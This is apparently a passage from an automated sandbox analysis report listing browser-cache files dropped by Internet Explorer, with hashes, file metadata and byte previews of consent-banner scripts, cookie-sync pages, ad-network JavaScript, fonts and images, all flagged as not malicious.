SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21717
Entropy (8bit):	5.305602492520896
Encrypted:	false
SSDEEP:	384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
MD5:	677C48207F5A13E6D6DADF30D2D6C52B
SHA1:	10BCE9871F228CA247E92B0A6366D5FE2A4426C8
SHA-256:	16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
SHA-512:	7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21717
Entropy (8bit):	5.305602492520896
Encrypted:	false
SSDEEP:	384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
MD5:	677C48207F5A13E6D6DADF30D2D6C52B
SHA1:	10BCE9871F228CA247E92B0A6366D5FE2A4426C8
SHA-256:	16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
SHA-512:	7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[4].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21717
Entropy (8bit):	5.305602492520896
Encrypted:	false
SSDEEP:	384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
MD5:	677C48207F5A13E6D6DADF30D2D6C52B
SHA1:	10BCE9871F228CA247E92B0A6366D5FE2A4426C8
SHA-256:	16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
SHA-512:	7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\checksync[5].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	21717
Entropy (8bit):	5.305602492520896
Encrypted:	false
SSDEEP:	384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
MD5:	677C48207F5A13E6D6DADF30D2D6C52B
SHA1:	10BCE9871F228CA247E92B0A6366D5FE2A4426C8
SHA-256:	16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
SHA-512:	7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\de-ch[2].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	79097
Entropy (8bit):	5.337866393801766
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
MD5:	408DDD452219F77E388108945DE7D0FE
SHA1:	C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
SHA-256:	197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
SHA-512:	17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
Malicious:	false
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	271194
Entropy (8bit):	5.144309124586737
Encrypted:	false
SSDEEP:	1536:l3JqIHQCSq23YILFMPpWje+KULpfqjI9zT:hqCSVyIeiijq
MD5:	69E873EC1DB1AA38922F46E435785B61
SHA1:	0E17DD5D16C19D40847AEEEC9AF898BB7F228801
SHA-256:	D90C45999873C12E05B6A850C7C5473E1CB3DA9BD087DB5F038F56ABD65F108C
SHA-512:	27F403FDC906C317F4023735B29ABB090867CAA41103CE2FD19E487323EBEE15884DF10A353741C218BB83C748464BE3D75459F5D086FDE983DB85FC86ADA4D4
Malicious:	false
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\nrrV52461[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	91348
Entropy (8bit):	5.423638505240867
Encrypted:	false
SSDEEP:	1536:uEuukXGs7ui3gn7qeOdillEx5Q3YzuCp9oZuvby3TdXPH6viqQDnjs2i:aKiw0di378uQMfHgjV
MD5:	9C4A60B2332E94D3BFF324BD8DF61A31
SHA1:	6245D60C273E175D3EC798CE8ABB65AD75F24E09
SHA-256:	8C38115211EB4E291CE6F38629C8AEE0F882EBED06B66F3DB3D6587C1EBDF52F
SHA-512:	31830D8DE79206C5C5B178DBC798D3A2AF597BA14D9075EE25CC82B096083B180B0B41CB5DC24640AC2A8329575102A3D724DA1F4307DDFB57DBC5C64A873817
Malicious:	false
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\nrrV52461[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	91348
Entropy (8bit):	5.423638505240867
Encrypted:	false
SSDEEP:	1536:uEuukXGs7ui3gn7qeOdillEx5Q3YzuCp9oZuvby3TdXPH6viqQDnjs2i:aKiw0di378uQMfHgjV
MD5:	9C4A60B2332E94D3BFF324BD8DF61A31
SHA1:	6245D60C273E175D3EC798CE8ABB65AD75F24E09
SHA-256:	8C38115211EB4E291CE6F38629C8AEE0F882EBED06B66F3DB3D6587C1EBDF52F
SHA-512:	31830D8DE79206C5C5B178DBC798D3A2AF597BA14D9075EE25CC82B096083B180B0B41CB5DC24640AC2A8329575102A3D724DA1F4307DDFB57DBC5C64A873817
Malicious:	false
Preview:	var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]\|\|(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)\|\|""===n\|\|null===n\|\|(n=t,"[object Array]"!==Object.prototype.toString.call(n))\|\|!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	325178
Entropy (8bit):	5.3450457320873355
Encrypted:	false
SSDEEP:	6144:7Kk89fToixHtGt3mBC4VcW3fUAbJ7Kz0yzGO:acixHMPzfJ
MD5:	56B5E93BFB078B9EEF2BA41DB521EA9B
SHA1:	A61A4949BCBCA6B8148CC6821D7CF88FBD90062F
SHA-256:	B8603101616C7960752244D2EC66D2A845BBE0094B83E7CC2877880A3A93402D
SHA-512:	C10E26F5C9B66E1FA82926AD43C7C70EDF00D3BEBE376DA674B325FB34EDB47EDF490BF84457BBC085BBFA1AF37D92F20067AA46B1334D623D2AE80B66810C02
Malicious:	false
Preview:	/** .. * onetrust-banner-sdk.. * v6.25.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}\|\|function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var v,e,r=function(){return(r=Object.assign\|\|function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l\|\|Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i\|\|[])).next())})}function p(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otTCF-ie[2].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	103536
Entropy (8bit):	5.315961772640951
Encrypted:	false
SSDEEP:	768:nq79kuJrnt6JjU7cVbkhS/G+FBlTjmSmjCRp0QRaPXJHJVhXKNTUCL29kJlXYoXY:49jht4bbkAOCRpl6TVgTUCLBX10UU/px
MD5:	6E60674C04FFF923CE6E30A0CD4B1A04
SHA1:	D77ED2B9FA6DD82C7A5F740777CC38858D9CBDDD
SHA-256:	48221F1DE0F509D6C365D9F4BA1D7DB8619E01C6BC4AC8462536836E582CDC66
SHA-512:	62F5068BDEDBA361DAD0B50B66F617A2A964B9D3DB748BF9DE29C4F6307B1891AF9A4D384F3CEB25C77B62D245F338D967084301391A41BAB9772E2632B36B96
Malicious:	false
Preview:	var otTCF=function(e){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function n(e,t){return e(t={exports:{}},t.exports),t.exports}function r(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return I.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return L(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\17-361657-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1238
Entropy (8bit):	5.066474690445609
Encrypted:	false
SSDEEP:	24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
MD5:	7ADA9104CCDE3FDFB92233C8D389C582
SHA1:	4E5BA29703A7329EC3B63192DE30451272348E0D
SHA-256:	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
SHA-512:	2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
Malicious:	false
Preview:	define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin\|\|(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\4996b9[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 45633, version 1.0
Category:	dropped
Size (bytes):	45633
Entropy (8bit):	6.523183274214988
Encrypted:	false
SSDEEP:	768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
MD5:	A92232F513DC07C229DDFA3DE4979FBA
SHA1:	EB6E465AE947709D5215269076F99766B53AE3D1
SHA-256:	F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
SHA-512:	32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
Malicious:	false
Preview:	wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... ............I.A_.<........... ........d........................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\55a804ab-e5c6-4b97-9319-86263d365d28[2].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3278
Entropy (8bit):	4.87966793369991
Encrypted:	false
SSDEEP:	96:Oy9Dwb40zrvdip5GKZa6AyYs9vjxWCKTS2jQt4ZaX:zqlipc6vxLCSCbZaX
MD5:	073E1A67C16B7E2B0F240F20BAC53174
SHA1:	778663FBA0201814BE193EB38E4F9D8875F322ED
SHA-256:	886E0D5D43DFB17D92EB8C5C80AB0671ED9DE247EC4AD9D71B358F32F7613287
SHA-512:	97FA869A8BE850E759BDB5AAA0E850B787358CC4EED55796F6B51D1AFD5B6B25CF7A6FAC5FCD67AA9588876F208D40449ED94886046177B6FEAA083743B01696
Malicious:	false
Preview:	{"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":true,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","gb","ws","gd","ge","gg"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOdxvW[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	23645
Entropy (8bit):	7.810879378215357
Encrypted:	false
SSDEEP:	384:IUEz+UYUKaDX4ZCDbcpwWpedBE/WYqU9m8LaBIlJcv1DAKvA4IFE4JN3QNr:IUEz+UbKa8ZQQptpedAWp8LaCHg1DAed
MD5:	F2186DFE6F4836465043A993391B84C5
SHA1:	C595247171C1DD8D73429B0C58773C5E177106C5
SHA-256:	710EFEEA80DBB97B005C47E34341F00ABCD3345A5756EC967A6D1D6D06094B22
SHA-512:	21E86B092676E1EAE42E18C680D176A045E8158CE8386DB7D8624B7D3C70E9A018C1992FCAB22A6FEBF824445BF1850E7E98BFB4AECDA769ADA52356DFCF43D3
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..pn..+1..(...P1.L..s.4..1@.8^2h....2)J...P"0..@.c..g<.!<..)..BW.J.."Xm4..0......4$..z.C+mL.........6.?. <......4. .Hb(.&8....=..1......A4..(.2.......HT...5.p.....{.E.4.p.....L.....{P....+HBc4..8.3I...y.S`d....7.k.U....B.........^(..h...H.m;..c...@..1@...B.@.Bc....p....4.}(..H..:S@.#..4...!...P!)..T.i..M..M...h..a..1.c..n(.......H...<?..1..........!...S.`8.1.J.1..0..h.H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAQBdIv[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	22371
Entropy (8bit):	7.7949964619592285
Encrypted:	false
SSDEEP:	384:IY3asYjHnqTeXCnV+vWN8ZiadjNBzJNCGNFq/NFfqoY7mZdd+f0naWx:IdHnmeyI+yi6NB25/NFfbFJnP
MD5:	F4B452436A19591E7C0ED1A7916B9259
SHA1:	5BA326F2E57A89A106689E4EC00B23D30AAA9DBE
SHA-256:	B13869EEC4400F3BDE2DE2F864E786ACC568D413FDA7FC619FC4AF87E6328B5D
